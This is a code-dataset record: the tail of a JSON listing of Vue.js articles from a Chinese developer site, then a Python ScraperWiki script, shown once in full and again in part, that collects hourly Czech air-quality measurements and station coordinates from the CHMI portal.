"https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/76c7c4b5c57141a29fa07041e6f3a9c8~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "Vue动画过渡(四)", "brief_content": "今天来搞搞过渡动画,搞完这个过渡下一篇咋们就做个Todo案例,因为有用到这个知识点。然后这篇文章我们主要就讲解其中的一两个部分啊,包括", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628386514", "mtime": "1628410838", "rtime": "1628400246", "draft_id": "6982434044130623519", "view_count": 111, "collect_count": 0, "digg_count": 5, "comment_count": 0, "hot_index": 10, "is_hot": 0, "rank_index": 0.00142989, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1601308361494712", "user_name": "性感的小肥猫", "company": "公众号:前端茶馆", "job_title": "前端小辣鸡", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/ec14894b2f2f60d8f040d1ce1eaee42a~300x300.image", "level": 2, "description": "It was meant to be.", "followee_count": 42, "follower_count": 63, "post_article_count": 56, "digg_article_count": 353, "got_digg_count": 480, "got_view_count": 19282, "post_shortmsg_count": 55, "digg_shortmsg_count": 10, "isfollowed": false, "favorable_author": 0, "power": 672, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6993866415916711949, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6884173598920015885", "article_info": {"article_id": "6884173598920015885", "user_id": "1345457960788637", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "vue3 + ant-design-vue 简易入门", "brief_content": "最近忙里偷闲,看了下vue3的相关文档,想着写点东西熟悉一下新版的代码。恰好当前时间节点上你能在市面上成熟使用的vue3的UI框架放眼望去,也就只有阿里旗下的Ant Design Vue 2.0.0测试版。正好以前都是用element-ui的,所以就萌生了用这个框架搭一个非常简…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1602846584", "mtime": "1602950666", "rtime": "1602950666", "draft_id": "6884171100121464839", "view_count": 2926, "collect_count": 11, "digg_count": 12, "comment_count": 11, "hot_index": 169, "is_hot": 0, "rank_index": 0.00142892, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1345457960788637", "user_name": "cshenger", "company": "上海银基", "job_title": "前端", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/5/26/17251101fcd23d0b~tplv-t2oaga2asx-image.image", "level": 1, "description": "", "followee_count": 60, "follower_count": 15, "post_article_count": 4, "digg_article_count": 38, "got_digg_count": 17, "got_view_count": 5798, "post_shortmsg_count": 28, "digg_shortmsg_count": 18, "isfollowed": false, "favorable_author": 0, "power": 74, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6884173598920015885, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6995081963614765093", "article_info": {"article_id": "6995081963614765093", "user_id": "2585697490843598", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "vue3中定义变量,ref、reactive、toRefs特性详解", "brief_content": "1.ref定义的变量,改变值要.value,而且在template中不用写.msg.reactive函数传入的为引用类型,例如数组、对象等,但不能代理基本类型值,返回一个响应式的数据对象, 想要使用创建的响应式数据也很简单,创建出来之后,在setup中return出去,直接在te...", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628669437", "mtime": "1628679886", "rtime": "1628679886", "draft_id": "6995081962792697869", "view_count": 163, "collect_count": 1, "digg_count": 1, "comment_count": 0, "hot_index": 9, "is_hot": 0, "rank_index": 0.00142802, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2585697490843598", "user_name": "倘若说", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/3fa1c5fa2a4228ec534b30e939353287~300x300.image", "level": 1, "description": "初来驾到,之前在csdn,希望与大家一起成长,不足之处请大家指出csdn博客地址:\nhttps://blog.csdn.net/hu104160112spm=1000.2115.3001.5343", "followee_count": 0, "follower_count": 0, "post_article_count": 62, "digg_article_count": 0, "got_digg_count": 1, "got_view_count": 1649, "post_shortmsg_count": 1, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 17, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}], "user_interact": {"id": 6995081963614765093, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6844904069228658701", "article_info": {"article_id": "6844904069228658701", "user_id": "2664871913069783", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844904069228658701", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/2/21/170668fb29cfd324~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "「Vue表单自动保存功能」踩坑", "brief_content": "所以接下来的问题就变成了如何解决watch 新老值一样的问题。 为了避免每次watch值的时候都去发起请求,我们得考虑去优化api接口的请求频次,这里采用防抖方案是最佳了。", "is_english": 0, "is_original": 1, "user_index": 10.187383203772, "original_type": 0, "original_author": "", "content": "", "ctime": "1582264736", "mtime": "1598844083", "rtime": "1582269548", "draft_id": "6845076643954835470", "view_count": 4747, "collect_count": 94, "digg_count": 72, "comment_count": 22, "hot_index": 331, "is_hot": 0, "rank_index": 0.00142693, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2664871913069783", "user_name": "lisiyizu", "company": "保密", "job_title": "前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/cb29ad272b03167293f5a0d1feb18c13~300x300.image", "level": 3, "description": "一枚与程序结缘的文艺小青年", "followee_count": 74, "follower_count": 234, "post_article_count": 15, "digg_article_count": 160, "got_digg_count": 711, "got_view_count": 47623, "post_shortmsg_count": 57, "digg_shortmsg_count": 112, "isfollowed": false, "favorable_author": 0, "power": 1071, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6844904069228658701, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6999826144992165896", "article_info": {"article_id": "6999826144992165896", "user_id": "3835531136870253", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "vue- 数据响应试", "brief_content": "Vue数据响应式 响应式即对外界的变化做出的反应的一种形式。 const vm = new Vue({data:{n: 0}}) 当修改 vm.n 或 data.n 时,render(data...)", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629774031", "mtime": "1629776792", "rtime": "1629776792", "draft_id": "6998887217041473543", "view_count": 85, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00142661, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3835531136870253", "user_name": "可恶啊", "company": "", "job_title": "", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/63e94db87fa0033a9990dc847e20b6cc~300x300.image", "level": 1, "description": "", "followee_count": 1, "follower_count": 0, "post_article_count": 48, "digg_article_count": 1, "got_digg_count": 5, "got_view_count": 1766, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 22, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6999826144992165896, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6844904085955543048", "article_info": {"article_id": "6844904085955543048", "user_id": "1275089219237566", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844904085955543048", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/3/10/170c1eab42f03eee~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "从零到部署:用 Vue 和 Express 实现迷你全栈电商应用(七)", "brief_content": "在之前的六篇教程中我们已经基本实现了迷你全栈电商应用,相信大家对于一个全栈应用的开发已经有了一个全面的认知。但是一个追求完美的工程师是不会吝啬他的艺术创造,仅仅实现应用的功能还不能满足用户的高需求,应用的界面效果也是提高用户体验的关键因素。因此本篇教程将基于element-ui…", "is_english": 0, "is_original": 1, "user_index": 10.127083533841, "original_type": 0, "original_author": "", "content": "", "ctime": "1583802061", "mtime": "1598853291", "rtime": "1583805723", "draft_id": "6845076666201407501", "view_count": 5401, "collect_count": 37, "digg_count": 37, "comment_count": 10, "hot_index": 317, "is_hot": 0, "rank_index": 0.00142549, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1275089219237566", "user_name": "图雀社区", "company": "", "job_title": "一只图雀 @ 公众号「图雀社区」", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/45045363f8d3194d407050c69a0fe5c7~300x300.image", "level": 5, "description": "汇集精彩的免费实战教程,主站 https://tuture.co", "followee_count": 143, "follower_count": 5891, "post_article_count": 68, "digg_article_count": 204, "got_digg_count": 10574, "got_view_count": 501010, "post_shortmsg_count": 38, "digg_shortmsg_count": 53, "isfollowed": false, "favorable_author": 1, "power": 15584, "study_point": 275, "university": {"university_id": "6888594356693893134", "name": "东华大学", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 3, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6844904085955543048, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6850037271106682887", "article_info": {"article_id": "6850037271106682887", "user_id": "4195392104182365", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/7/12/17342671c8175745~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "仿去哪儿网项目视频学习总结 ", "brief_content": "本文就不根据整个项目从头到尾来详写了,掘金社区很多写得很好的大神已经把这整个项目总结的文章写的非常好了,例如:Chrislinlin作者写的Vue.js开发去哪儿网WebApp,还有一些写的好的文章,我就不一一列举了。 所以本文只记录我个人记录在项目学习笔记本上的一些点。这个仿…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1594665285", "mtime": "1603787513", "rtime": "1594697583", "draft_id": "6850424869638078477", "view_count": 3525, "collect_count": 34, "digg_count": 48, "comment_count": 10, "hot_index": 234, "is_hot": 0, "rank_index": 0.00142516, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4195392104182365", "user_name": "EvenyYlzz", "company": "SHEIN", "job_title": "前端学者", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/c82657234e7fddde4749e778120e48a6~300x300.image", "level": 3, "description": "抖音号:EvenyYl\n抖音昵称:Even小易\n1.01^365≈37.8 天天向上的力量", "followee_count": 15, "follower_count": 353, "post_article_count": 20, "digg_article_count": 82, "got_digg_count": 925, "got_view_count": 41661, "post_shortmsg_count": 24, "digg_shortmsg_count": 45, "isfollowed": false, "favorable_author": 0, "power": 1341, "study_point": 1260, "university": {"university_id": "6888594419197411341", "name": "中南林业科技大学", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 3, "select_event_count": 0, "select_online_course_count": 9, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6850037271106682887, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6990642401408729096", "article_info": {"article_id": "6990642401408729096", "user_id": "2867969792410471", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue中 .sync 修饰符的作用", "brief_content": "Vue 的组件在接受外部数据 props 时,Vue 规定,子组件在通过 props 接受外部数据后只有使用该数据的权利,但没有修改该属性的权利。 因此 Vue 规定组件只能有权使用 props 的属", "is_english": 0, "is_original": 1, "user_index": 0.224364011567325, "original_type": 0, "original_author": "", "content": "", "ctime": "1627635940", "mtime": "1627875210", "rtime": "1627875210", "draft_id": "6990545557626290183", "view_count": 175, "collect_count": 4, "digg_count": 4, "comment_count": 0, "hot_index": 12, "is_hot": 0, "rank_index": 0.00142512, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2867969792410471", "user_name": "每天一遍HelloWorld", "company": "", "job_title": "", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/8fd806ed7d6a195ec4c1dd1bcd64be89~300x300.image", "level": 1, "description": "", "followee_count": 1, "follower_count": 2, "post_article_count": 27, "digg_article_count": 9, "got_digg_count": 21, "got_view_count": 1933, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 40, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6990642401408729096, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}], "cursor": "eyJ2IjoiNzAwNzI1MjQ2NDcyNjQ1ODM5OSIsImkiOjMzODB9", "count": 11060, "has_more": true} | [
"www.1759633997@qq.com"
] | www.1759633997@qq.com |
bfb953ab310f302eb8ffded9021eab8dcf3d59c9 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/J/jindrichmynarz/air_pollution.py | 2f4733075ffae9ef96d3f49abd1b74a7777bbad3 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,030 | py | ####################################
# Informace o kvalitě ovzduší v ČR #
####################################
import datetime, re, scraperwiki, urlparse
from BeautifulSoup import BeautifulSoup
def getEvaluation(node):
evaluation = re.match(
"\d+(\.\d+)?",
node.find("span").text.encode("utf8").replace(",", ".").replace(" ", "")
)
if evaluation:
evaluation = evaluation.group()
else:
style = node["style"]
if style == "background-color: white":
evaluation = "Neúplná data"
elif style == "background-color: #CFCFCF":
evaluation = "Veličina se na uvedené stanici neměří"
else:
evaluation = ""
return evaluation
def reformatDate(text):
match = re.match(
"(?P<day>\d{2})\.(?P<month>\d{2})\.(?P<year>\d{4})\s+(?P<hours>\d{2}):(?P<minutes>\d{2})",
text
)
date = "{0[0]}-{0[1]}-{0[2]}T{0[3]}:{0[4]}:00+01:00".format(
map(match.group, ["year", "month", "day", "hours", "minutes"])
)
return date
def reformatCoords(text):
latitude, longitude = text.encode("utf-8").replace(" sš ", "N\n").replace(" vd", "E").replace("°", "").replace("´", "'").split("\n")
return latitude, longitude
def scrapeWeatherStation(url):
html = scraperwiki.scrape(url)
soup = BeautifulSoup(html)
tds = soup.find("table").findAll("td")
altitude = re.match("\d+", tds[-1].text).group()
latitude, longitude = reformatCoords(tds[-3].text)
return latitude, longitude, altitude
# Vytvoření záhlaví ukládaných dat
scraperwiki.sqlite.save_var(
"data_columns",
[
"code", "name", "owner",
"province", # Kraj
"latitude", "longitude", "altitude",
"time", "airquality", "SO2_1h",
"NO2_1h", "CO_1h", "O3_1h", "PM10_1h",
"PM10_24h"
]
)
# Získání stránky
startingUrl = "http://portal.chmi.cz/files/portal/docs/uoco/web_generator/actual_hour_data_CZ.html"
html = scraperwiki.scrape(startingUrl)
soup = BeautifulSoup(html)
# Najdi první tabulku
table = soup.find("table")
trs = table.findAll("tr")
for tr in trs:
ths = tr.findAll("th")
tds = tr.findAll("td")
rowSignature = (len(tds), len(ths))
if rowSignature == (0, 9):
th = tr.find("th")
province = th.text.replace("Kraj: ", "")
th = th.findNext().text
date = reformatDate(th)
elif rowSignature == (0, 10):
pass
elif rowSignature == (10, 1):
pass
elif rowSignature == (11, 0):
td = tr.find("td")
identifier = td.find("a")
code = identifier.text
weatherStationUrl = urlparse.urljoin(startingUrl, identifier["href"])
latitude, longitude, altitude = scrapeWeatherStation(weatherStationUrl)
td = td.findNext().findNext()
name = td.text
td = td.findNext()
owner = td.text
td = td.findNext()
airquality = getEvaluation(td)
td = td.findNext("td")
SO2_1h = getEvaluation(td)
td = td.findNext("td")
NO2_1h = getEvaluation(td)
td = td.findNext("td")
CO_1h = getEvaluation(td)
td = td.findNext("td")
O3_1h = getEvaluation(td)
td = td.findNext("td")
PM10_1h = getEvaluation(td)
td = td.findNext("td").findNext("td")
PM10_24h = getEvaluation(td)
scraperwiki.datastore.save(["code"], {
"code" : code,
"name" : name,
"owner" : owner,
"province" : province,
"latitude" : latitude,
"longitude" : longitude,
"altitude" : altitude,
"time" : date,
"airquality" : airquality,
"SO2_1h" : SO2_1h,
"NO2_1h" : NO2_1h,
"CO_1h" : CO_1h,
"O3_1h" : O3_1h,
"PM10_1h" : PM10_1h,
"PM10_24h" : PM10_24h,
}, date = datetime.datetime(*map(int, re.split('[^\d]', date)[:-2])))
else:
raise Exception
####################################
# Informace o kvalitě ovzduší v ČR #
####################################
import datetime, re, scraperwiki, urlparse
from BeautifulSoup import BeautifulSoup
def getEvaluation(node):
evaluation = re.match(
"\d+(\.\d+)?",
node.find("span").text.encode("utf8").replace(",", ".").replace(" ", "")
)
if evaluation:
evaluation = evaluation.group()
else:
style = node["style"]
if style == "background-color: white":
evaluation = "Neúplná data"
elif style == "background-color: #CFCFCF":
evaluation = "Veličina se na uvedené stanici neměří"
else:
evaluation = ""
return evaluation
def reformatDate(text):
match = re.match(
"(?P<day>\d{2})\.(?P<month>\d{2})\.(?P<year>\d{4})\s+(?P<hours>\d{2}):(?P<minutes>\d{2})",
text
)
date = "{0[0]}-{0[1]}-{0[2]}T{0[3]}:{0[4]}:00+01:00".format(
map(match.group, ["year", "month", "day", "hours", "minutes"])
)
return date
def reformatCoords(text):
latitude, longitude = text.encode("utf-8").replace(" sš ", "N\n").replace(" vd", "E").replace("°", "").replace("´", "'").split("\n")
return latitude, longitude
def scrapeWeatherStation(url):
html = scraperwiki.scrape(url)
soup = BeautifulSoup(html)
tds = soup.find("table").findAll("td")
altitude = re.match("\d+", tds[-1].text).group()
latitude, longitude = reformatCoords(tds[-3].text)
return latitude, longitude, altitude
# Vytvoření záhlaví ukládaných dat
scraperwiki.sqlite.save_var(
"data_columns",
[
"code", "name", "owner",
"province", # Kraj
"latitude", "longitude", "altitude",
"time", "airquality", "SO2_1h",
"NO2_1h", "CO_1h", "O3_1h", "PM10_1h",
"PM10_24h"
]
)
# Získání stránky
startingUrl = "http://portal.chmi.cz/files/portal/docs/uoco/web_generator/actual_hour_data_CZ.html"
